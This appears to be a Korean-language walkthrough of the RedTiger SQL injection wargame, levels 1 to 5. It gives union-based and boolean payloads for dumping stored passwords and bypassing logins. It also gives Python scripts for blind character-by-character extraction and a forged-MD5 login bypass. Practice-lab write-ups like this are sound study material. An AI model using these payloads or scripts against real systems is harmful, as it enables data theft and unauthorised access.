Level 1
id = 1 union select 1,2,password ,4 from level1_users
Level 2
id : 1' or '1'='1
pw : 1' or '1'='1
Level 3
preg_match error 유발 -> source auditing 'urlcrypt.inc'
encrypt 함수 그대로 이용해서 injection 시도
encrypt("' union select 1,2,3,username,password,6,7 from level3_users where username='admin'#")
Level 4
blind 할 때, ascii() 를 거치지 않고 substr()=0x61 처럼 hex literal 과 바로 비교할 수 있다. (MySQL에서 0x61 같은 hex literal 은 binary string 이라 따옴표 없이 주입할 수 있어 quote 처리에 걸리지 않는다. 다만 일반 문자열 비교와 달리 대소문자 구분이 되는지는 대상 칼럼의 collation 에 따라 달라질 수 있으니, 대소문자가 섞인 값을 뽑을 때는 확인하고 쓰자.)
import urllib2
import time
import string
# Cookie header attached to every probe request that pwn() sends.
headers = dict(Cookie="level4login=there_is_no_bug")
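def pwn(payload):
    """Send one blind-SQLi probe and report whether it evaluated true.

    ``payload`` is URL-encoded and placed in the ``id`` parameter of
    level4.php.  The probe is considered "true" when the response body
    contains the literal text ``Query returned 1 rows.``; any other body
    (including an error page) counts as false.

    Args:
        payload: raw SQL expression to inject; quoting/encoding is done here.

    Returns:
        True if the page reports exactly one row, otherwise False.

    Raises:
        Whatever urllib2 raises on a network or HTTP failure (URLError /
        HTTPError); these are deliberately not swallowed, because a
        transport error would otherwise be indistinguishable from "false"
        and silently corrupt the extracted value.
    """
    print(payload)  # progress trace: one line per probe
    url = "http://redtiger.labs.overthewire.org/level4.php?id={}".format(
        urllib2.quote(payload))
    req = urllib2.Request(url, headers=headers)
    resp = urllib2.urlopen(req)
    try:
        body = resp.read()
    finally:
        # getPw() fires hundreds of probes; the original never closed the
        # response, leaking a socket per call.
        resp.close()
    return "Query returned 1 rows." in body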
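def getPwLength(max_len=30):
    """Recover the length of the first ``keyword`` row in ``level4_secret``.

    Probes the lengths 0 .. max_len-1 in order with a boolean
    ``if(length(keyword)=N,1,0)`` condition and stops at the first one
    that pwn() reports as true.

    Args:
        max_len: exclusive upper bound on the lengths tried.  Defaults to
            30, which is the range the original hard-coded.

    Returns:
        The matched length as an int.

    Raises:
        RuntimeError: if no length below ``max_len`` matched.  The original
            fell out of its loop and returned the last value tried (29) in
            that case, so getPw() would then extract garbage; failing
            loudly here is safer.
    """
    probe = "if((select length(keyword) from level4_secret limit 0,1)={},1,0)"
    for n in range(max_len):
        if pwn(probe.format(n)):
            print("pw len : {}".format(n))
            return n
    raise RuntimeError("keyword length not found below {}".format(max_len))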
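def getPw():
    """Extract the keyword one character at a time via blind SQL injection.

    For each position 1..len (len from getPwLength()), every character of
    ``string.printable`` is tried by comparing ``substr(keyword, pos, 1)``
    against the candidate written as a hex literal (e.g. ``0x61``).  A hex
    literal needs no quotes, so the injected string never has to carry a
    quote character of its own.

    Returns:
        The recovered keyword as a str.

    Raises:
        RuntimeError: if some position matches none of the printable
            candidates.  The original silently skipped such a position,
            so its result could be shorter than the real keyword with all
            later characters shifted; better to stop and report.
    """
    probe = "if((select substr(keyword,{},1) from level4_secret limit 0,1)={},1,0)"
    recovered = []
    for pos in range(1, getPwLength() + 1):
        for cand in string.printable:
            if pwn(probe.format(pos, hex(ord(cand)))):
                recovered.append(cand)
                print("pw : {}".format("".join(recovered)))
                break
        else:
            raise RuntimeError(
                "no printable character matched at position {}".format(pos))
    return "".join(recovered)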
if __name__ == "__main__":
    # Script entry point: run the whole blind extraction end to end.
    getPw()
Level 5
username parameter의 pw 칼럼 위치에 있는 값과, pw 값을 같게 만들어 주면 된다.
pw는 md5 hash 값으로 저장되어 있기 때문에(암호화(encrypt)가 아니라 단방향 hash), 같은 방식으로 계산한 md5 hash 값을 넣어준다. hex digest 는 [0-9a-f] 만 포함하므로 union 구문의 작은따옴표 안에 그대로 넣어도 escape 가 필요 없다.
import urllib2
import md5
from urllib import urlencode
# Cookie header attached to the login request that pwn() sends.
headers = dict(Cookie="level5login=there_is_a_truck")
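def pwn(password):
    """POST a UNION-injected login to level5 and return the response body.

    The ``username`` field is injected with ``' union select 1,'<md5>'#``
    so that the second column of the resulting row is ``md5(password)``
    (per the writeup, that is the column the level compares against the
    submitted password's hash); the plain ``password`` is sent alongside so
    the two agree.  The MD5 hex digest contains only ``[0-9a-f]``, so it is
    safe inside the single quotes without escaping.

    Args:
        password: any string; it is only hashed, never interpreted as SQL.

    Returns:
        The raw response body (str) from the login endpoint.

    Raises:
        Whatever urllib2 raises on a network or HTTP failure (URLError /
        HTTPError); not swallowed on purpose.
    """
    # The ``md5`` module is deprecated since Python 2.5 and removed in 3;
    # hashlib.md5 is the drop-in replacement.  Imported here so the block
    # stands on its own without touching the file-level imports.
    import hashlib
    pw_bytes = password if isinstance(password, bytes) else password.encode("utf-8")
    digest = hashlib.md5(pw_bytes).hexdigest()
    params = {
        "username": "' union select 1,'{}'#".format(digest),
        "password": password,
    }
    url = "http://redtiger.labs.overthewire.org/level5.php?mode=login"
    req = urllib2.Request(url, urlencode(params), headers=headers)
    resp = urllib2.urlopen(req)
    try:
        return resp.read()
    finally:
        resp.close()  # the original never closed the response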
if __name__ == "__main__":
    # Script entry point: the password is arbitrary, since the injected
    # row carries its own hash; dump whatever the server answers.
    print(pwn("jskim"))